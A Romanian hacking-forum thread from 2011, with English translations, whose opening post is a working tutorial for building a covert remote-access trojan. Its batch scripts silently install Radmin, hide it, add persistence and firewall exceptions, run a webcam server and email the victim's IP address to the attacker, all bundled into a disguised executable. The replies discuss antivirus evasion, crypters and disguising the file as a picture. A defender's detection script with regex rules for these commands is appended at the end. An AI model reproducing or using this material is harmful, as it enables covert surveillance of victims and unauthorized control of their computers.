SenatoR_v Posted February 17, 2011 Report Posted February 17, 2011 (edited) In tutorialul urmator am sa va arat cum facem un tojan cu care sa avem remote desktop,cmd,remote file(radmin) sa avem acces si la web camera + ip-ul victimei sa ne vina pe mail Downloadam Radmin 3Îl face instal cu un cadru lini?tit ?i ad?ugam unu utilizator nou prin intermediul registruluiPentru aceasta trebuie s? facem un fisier .batradmin_install.bat@echo off::Deschide instal radmin linistit fara a face restartstart msiexec.exe /i "radmin.msi" /quiet /norestart::Prin aceasta ascundem iconulreg add "HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server" /v HideTrayIcon /t REG_DWORD /d 1 /f::Verificam daca nu a mai fost instalat radmin cu un alt userFor /F "tokens=1" %%a in ('reg query "HKLM\SOFTWARE\Radmin\v3.0\Server\Parameters\Radmin Security\1"') do set regpath=%%a If DEFINED regpath (goto make_user2) Else (goto add_user)::Daca a fost, cream un user nou:make_user2echo Windows Registry Editor Version 5.00 > log_pass.regecho. >> log_pass.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server\Parameters\Radmin Security\10] >> log_pass.regcopy /b log_pass.reg + user.txtreg import log_pass.reg && del log_pass.regexit::Daca nu a fost il facem noi pe primul:add_userecho Windows Registry Editor Version 5.00 > log_pass.regecho. >> log_pass.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server\Parameters\Radmin Security\1] >> log_pass.regcopy /b log_pass.reg + user.txtreg import log_pass.reg && del log_pass.regexitAceasta creeaz? un fi?ier de registru pentru utilizatorEste necesar s? se fac? 
un fi?ier text cu numele de utilizator ?i parolauser.txt La sfirsit neaparat trebue sa fie 2 lini goale.Asa arata login si parola utilizatorului hexat.Aici sunt urmatoarele date:Login: userParola: 
radminuserDeasemena puteti sa adaugati un utilizator cu ce date doriti Pentru asta, instalati radmin 3 si creativa un user cu parola..Dupa care exportati fisierul: HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server\Par ameters\Radmin Security\1Va fi aceiasi ca user.txt numai ca cu datele utilizatorului creat de voi:)Acum noi avem:1) radmin.msi2) radmin_install.bat3) user.txtEste de dorit sa le lipim pe toate impreuna cu ajutorul programului: bat_to_exe converterConfiguram similar ca in imagine Ne ducem la include urcam celelalte 2 fisiere(radmin.msi ? user.txt)Facem clic pe CompileCu Radminulo am terminat!Ip pe mailDaca victima noastra are internet 3G la fiecare conectare la internet este posibil sa i se schimbe ip-ul asa ca va propun sa folositi optiunea "Ping" care la fiecare conectare raporteaza pe mail daca victima are alt ip.Incepem cu WinVer(Joaca un rol important)WinVer.bat@echo off:: Vedem ce fel de windows e instalatfor /f "tokens=2*" %%a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName ^| find "ProductName"') do set ProductName=%%bif "%ProductName%" == "Microsoft Windows 2000" (goto IP)if "%ProductName%" == "Microsoft Windows XP" (goto IP)if "%ProductName%" == "Windows Vista Ultimate" (goto IPv4)if "%ProductName%" == "Windows Vista Enterprise" (goto IPv4)if "%ProductName%" == "Windows Vista Business" (goto IPv4)if "%ProductName%" == "Windows Vista Home Premium" (goto IPv4)if "%ProductName%" == "Windows Vista Home Basic" (goto IPv4)if "%ProductName%" == "Windows Vista Starter" (goto IPv4)if "%ProductName%" == "Windows Vista Ultimate" (goto IPv4)if "%ProductName%" == "Windows Vista Enterprise" (goto IPv4)if "%ProductName%" == "Windows Vista Business" (goto IPv4)if "%ProductName%" == "Windows Vista Home Premium" (goto IPv4)if "%ProductName%" == "Windows Vista Home Basic" (goto IPv4)if "%ProductName%" == "Windows Vista Starter" (goto IPv4)if "%ProductName%" == "Windows 7 Ultimate" (goto IPv4)if "%ProductName%" == "Windows 7 
Enterprise" (goto IPv4)if "%ProductName%" == "Windows 7 Professional" (goto IPv4)if "%ProductName%" == "Windows 7 Home Premium" (goto IPv4)if "%ProductName%" == "Windows 7 Home Basic" (goto IPv4)if "%ProductName%" == "Windows 7 Starter" (goto IPv4)if "%ProductName%" == "%ProductName%" (goto IP):: Dac e ?? sau 2000 Vom folosi IP:IPecho start /d sysfiles\ send_IP.exe >> ..\ping.batecho exit >> ..\ping.batschtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\ping.batschtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\sysfiles\send_IP.exe"del send_IPv4.exeexit:: Daca e ?? sau 2000 vom folosi IPv4:IPv4echo start /d sysfiles\ send_IPv4.exe >> ..\ping.batecho exit >> ..\ping.batschtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\ping.bat /fschtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "%SystemRoot%\system32\sysfiles\send_IPv4.exe" /fdel send_IP.exeexitDaca veti folosi "Ping", atunci stergeti textul marcat cu rosuDaca nu veti folosi "Ping",atunci stergeti textul marcat cu albastruInsusi Pingul pentru verificarea ip-ului.Ping.bat@echo offping ya.ru -n 5 >nulif %errorlevel%==0 (goto send) else (goto end):endexit:sendLa sfirsit neaparat trebue sa fie un rind gol.Mergem mai departe.Neaparat ferificam schimbarea si trimiterea ip-ului pe mail.Send_IP.bat@echo offset mail=blat.exe send.txt -to mailul_vostru@gmail.comif not exist ip1.txt (if not exist ip3.txt del ip3.txt 3.txt & ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IP" ip1.txt >> 1.txt) else (goto test1):test1if exist ip2.txt (goto test2) else (ipconfig /all > ip2.txt & Echo %COMPUTERNAME% > 2.txt & findstr "IP" ip2.txt >> 2.txt)del ip3.txt 3.txtfc 1.txt 2.txtIF %ERRORLEVEL% == 1 (copy /y 2.txt send.txt | %mail%)exit:test2if exist ip3.txt (goto test3) else (ipconfig /all > ip3.txt & Echo %COMPUTERNAME% > 3.txt & findstr 
"IP" ip3.txt >> 3.txt)del ip1.txt 1.txtfc 2.txt 3.txtIF %ERRORLEVEL% == 1 (copy /y 3.txt send.txt | %mail%)exit:test3if exist ip1.txt (goto test1) else (ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IP" ip1.txt >> 1.txt)del ip2.txt 2.txtfc 3.txt 1.txtIF %ERRORLEVEL% == 1 (copy /y 1.txt send.txt | %mail%)exitSend_IPv4.bat@echo offset mail=blat.exe send.txt -to mailul_vostru@gmail.comif not exist ip1.txt (if not exist ip3.txt del ip3.txt 3.txt & ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IPv4" ip1.txt >> 1.txt) else (goto test1):test1if exist ip2.txt (goto test2) else (ipconfig /all > ip2.txt & Echo %COMPUTERNAME% > 2.txt & findstr "IPv4" ip2.txt >> 2.txt)del ip3.txt 3.txtfc 1.txt 2.txtIF %ERRORLEVEL% == 1 (copy /y 2.txt send.txt | %mail%)exit:test2if exist ip3.txt (goto test3) else (ipconfig /all > ip3.txt & Echo %COMPUTERNAME% > 3.txt & findstr "IPv4" ip3.txt >> 3.txt)del ip1.txt 1.txtfc 2.txt 3.txtIF %ERRORLEVEL% == 1 (copy /y 3.txt send.txt | %mail%)exit:test3if exist ip1.txt (goto test1) else (ipconfig /all > ip1.txt & Echo %COMPUTERNAME% > 1.txt & findstr "IPv4" ip1.txt >> 1.txt)del ip2.txt 2.txtfc 3.txt 1.txtIF %ERRORLEVEL% == 1 (copy /y 1.txt send.txt | %mail%)exitDeci avem urmatoarele fisiere.WinVer.batSend_IP.batSend_IPv4.batDeasemenea le lipim cu ajutorul programului Bat To Exe Converter cu urmatoarele configuratii.Ping.bat il lasam asa cum esteRaportul il va trimite programul BlatSi cu asta terminam.Acum a ramas cea mai interesanta parte sa creem chiar instalul.Principalu este sa nu te incurci Install.bat@ECHO OFF:: Este necesara pentra ca consola sa inteleaga caracterele rusesti si sa ascunda dosarul Radmin din meniu start.reg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v CodePage /t REG_DWORD /d 1251 /freg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FaceName /t REG_SZ /d "Lucida Console" /freg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FontFamily /t REG_DWORD /d 0x0000036 /freg add 
HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FontSize /t REG_DWORD /d 0x000c0000 /freg add HKCU\Console\%%SystemRoot%%_system32_cmd.exe /v FontWeight /t REG_DWORD /d 0x00002bc /f::Deschidem radminul nostru pregatitstart radmin_install.exe::Creem foldere pentru pastrarea fisierelormkdir %systemroot%\system32\sysfilesmkdir %SystemRoot%\system32\sysfiles\server::Extragem fi?ierele ?i copiam în directorul necesarecopy /y "blat.exe" "%SystemRoot%\system32\sysfiles\blat.exe"copy /y "blat.lib" "%SystemRoot%\system32\sysfiles\blat.lib"copy /y "blat.dll" "%SystemRoot%\system32\sysfiles\blat.dll"copy /y "send_IP.exe" "%SystemRoot%\system32\sysfiles\send_IP.exe"copy /y "send_IPv4.exe" "%SystemRoot%\system32\sysfiles\send_IPv4.exe"copy /y "winver.exe" "%SystemRoot%\system32\sysfiles\winver.exe"copy /y "ping.bat" "%SystemRoot%\system32\ping.bat"copy /y "cam_server.exe" "%SystemRoot%\system32\sysfiles\server\cam_server.exe"::Adaugam exceptie FireWall-uinetsh firewall add allowedprogram "%SystemRoot%\system32\sysfiles\server\cam_server.exe" "cam_server" ENABLEnetsh firewall add portopening tcp 57011 all::Facem configurarea Blat pentri trimiterea pe mail"%SystemRoot%\system32\sysfiles\blat.exe" -install -server smtp.gmail.com -port 587 -f mailul@gmail.com -u Login -pw Parola::Il deschidem odata cu Windowsu-ulreg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "%SystemRoot%\system32\sysfiles\server\cam_server.exe pass=Parola port=57011" /f::Prima trimitere de IP indata dupa rulareipconfig /all > %SystemRoot%\system32\sysfiles\ip1.txt & Echo %COMPUTERNAME% > %SystemRoot%\system32\sysfiles\1.txt & findstr "IP" %SystemRoot%\system32\sysfiles\ip1.txt >> %SystemRoot%\system32\sysfiles\1.txt"%SystemRoot%\system32\sysfiles\blat.exe" "%SystemRoot%\system32\sysfiles\1.txt" -to mailul vostru@gmail.com::Deschide WinVer care ne arata ce mod de trimitere a IP-ului se va utilizacd %SystemRoot%\system32\sysfiles\start winver.exe::Deschidem serverul Web 
camereicd %SystemRoot%\system32\sysfiles\serverstart cam_server.exe pass=PAROLA port=57011::Stergem ce e de prisosrmdir /s /q "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Radmin Server 3"rmdir /s /q "c:\Documents and Settings\%username%\??????? ????\?????????\Radmin Server 3"del /q "%SystemRoot%\system32\sysfiles\winver.exe"exitDaca nu folositi RemCam doar stergeti rindurile unde se intilneste.DownloadamRemCam(In arhiva este si server si client)Aproape totDin nou ne lipim organele cu ajutorul Bat To Exe ConverterRespectind configuratile din imagineMergem in fila include si din nou adaugam urmatoarele fisiere:ping.bat (Daca il veti folosi)send_IP.exesend_IPv4.exeWinVer.exeradmin_install.execam_server.exe (Daca il veti folosi)blat.exeblat.dllblat.libDownload all bat filesblatApoi mergem in fila Versioninformations si bagam un icon si ne bucuram de Trojan Credite:SenatoR Edited March 1, 2011 by SenatoR_v Quote
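A defender's view of the commands in the post above, as an added example that is not part of the original thread: the script matches process-creation command lines against the distinctive steps the post describes (silent Radmin install, hidden tray icon, SYSTEM scheduled task under `system32\sysfiles`, firewall exception, Run key for `cam_server.exe`, Blat SMTP setup) and flags hosts where several occur together. The `host|command` log format, the sample lines, the rule names and the three-rule threshold are assumptions of this example.

```python
import re
from collections import defaultdict

# Each rule mirrors one command from the post; rule names are this example's own.
RULES = {
    "radmin_silent_install": r'msiexec\S*\s(?=.*radmin)(?=.*/quiet\b)',
    "radmin_tray_hidden": r'\breg\S*\s+add\b(?=.*\\Radmin\\v3\.0\\Server)(?=.*HideTrayIcon)',
    "system_task_sysfiles": r'schtasks\S*\s+/create\b(?=.*NT AUTHORITY\\SYSTEM)(?=.*\\system32\\sysfiles\\)',
    "firewall_exception": r'netsh\S*\s+firewall\s+add\s+(allowedprogram|portopening)\b',
    "run_key_cam_server": r'\breg\S*\s+add\b(?=.*\\CurrentVersion\\Run\b)(?=.*cam_server\.exe)',
    "blat_smtp_setup": r'blat\.exe"?\s+-install\b(?=.*-server\b)',
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}

# Constructed sample: "host|command line", as exported from process-creation logging.
SAMPLE_LINES = r"""
PC01|msiexec.exe /i "radmin.msi" /quiet /norestart
PC01|reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server" /v HideTrayIcon /t REG_DWORD /d 1 /f
PC01|schtasks /create /tn "security" /sc minute /mo 30 /ru "NT AUTHORITY\SYSTEM" /tr "C:\Windows\system32\sysfiles\send_IP.exe"
PC01|netsh firewall add portopening tcp 57011 all
PC02|msiexec.exe /i "radmin.msi" /quiet /norestart
PC02|schtasks /create /tn "backup" /sc daily /ru "NT AUTHORITY\SYSTEM" /tr "C:\Tools\backup.cmd"
PC03|reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d "C:\App\upd.exe" /f
""".strip().splitlines()


def hits_by_host(lines):
    """Map host -> set of rule names matched by that host's command lines."""
    hits = defaultdict(set)
    for line in lines:
        host, _, cmd = line.partition("|")
        for name, rx in COMPILED.items():
            if rx.search(cmd):
                hits[host].add(name)
    return dict(hits)


def suspicious_hosts(lines, min_rules=3):
    """A single rule can be ordinary admin work (Radmin is a legitimate tool);
    several distinct rules on one host is the pattern worth triaging."""
    return sorted(h for h, r in hits_by_host(lines).items() if len(r) >= min_rules)


if __name__ == "__main__":
    for host, rules in sorted(hits_by_host(SAMPLE_LINES).items()):
        print(host, sorted(rules))
    print("triage:", suspicious_hosts(SAMPLE_LINES))
```

On a flagged host, the registry key `HKLM\SOFTWARE\Radmin\v3.0\Server\Parameters\Radmin Security` and the scheduled task list are the places to confirm what was actually configured.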
drakeRizz, posted February 17, 2011: Straight copy-paste plus a bit of translation from the Russians; you'd have been better off not giving credits at all. And in the end, why would you do all this when you can just install a RAT?
SenatoR_v (author), posted February 17, 2011: 1. There is a similar tutorial on xakepok, and that one was written by my cousin, plus it was different; this tutorial was originally created by me for the Russian forum xakepok, and I don't think anyone is going to take my credits! 2. YOU ALSO LEARN SOMETHING BY READING ALL OF IT, INSTEAD OF SITTING AND WATCHING HOW SPY NET ETC. DO THEIR JOB WHILE YOU HAVE NO IDEA WHAT THEY DID!
un_stra1n, posted February 18, 2011: How can we make the trojan undetectable? I'm interested in Avira. And which file do I have to send to the victim? And what's the deal with a RAT? Is it simpler?
SenatoR_v (author), posted February 18, 2011 (edited February 19, 2011 by SenatoR_v): Damn it, the RAT is what you end up building at the end! And you make it undetectable by Avira if you change its icon!
drakeRizz, posted February 24, 2011: It's clear... senator is your name. Good luck with your mice, or whatever these are.
nicusor.ilie, posted March 1, 2011: 1) Thank you for the tutorial. 2) And how do you change the icon (so that it's undetectable)? 3) All the archives are corrupted! I can't open them (with WinRAR). I ask the owner, or whoever has them, to repost them. Thank you. 4) How do you proceed if the victim also has ZoneAlarm installed? And a wireless router? 5) Can any (remote control) program be used instead of Radmin (such as VNC)? Thank you.
fabio_livese, posted March 3, 2011: Can someone help me with some remotes? For a fee, of course.
vaio, posted March 13, 2011: I'm rather thick-headed by nature. Can you explain to me, as if for dummies, what I send to the "victim" and what I use myself? I know I'll be using Radmin, but apart from that, do I need to install some .bat or something? Thank you!
Laurix, posted April 28, 2011: Read carefully and you'll see what you have to do.
MagicThunder, posted April 28, 2011: You really are inept, so to speak. The tutorial is spoon-fed, explained "as if for dummies"; it gives you all the details plus all the files you need. If you have imagination you can apply this tutorial to other RATs too. To avoid being detected by antivirus it's advisable to have a good Crypter, plus not to scan it with the antivirus, so that it doesn't get taken into the database. @un_stra1n you send the server to the victim, and un_senator :)) "And you make it undetectable by Avira if you change its icon!" you floored me here :)) well, if you only changed its icon, why would it still need crypting? As I was saying: you can adapt the tutorial to other RATs too. Sky is the limit!
andrew-46, posted April 29, 2011: Not that I'm a great expert, but I did what you explained above without too many complications, with Bat To Exe Converter, a picture, a Radmin server, a .vbs and a .bat... For the IP by mail I used the site How to find someones IP address, and what the .vbs does is open that address I received in IE (invisible window)... Anyway, in the end I was left with just one executable, with a JPG icon, which actually opens a picture when it's executed...
proxyy, posted January 2, 2014: In the first part, which one is the radmin.msi file?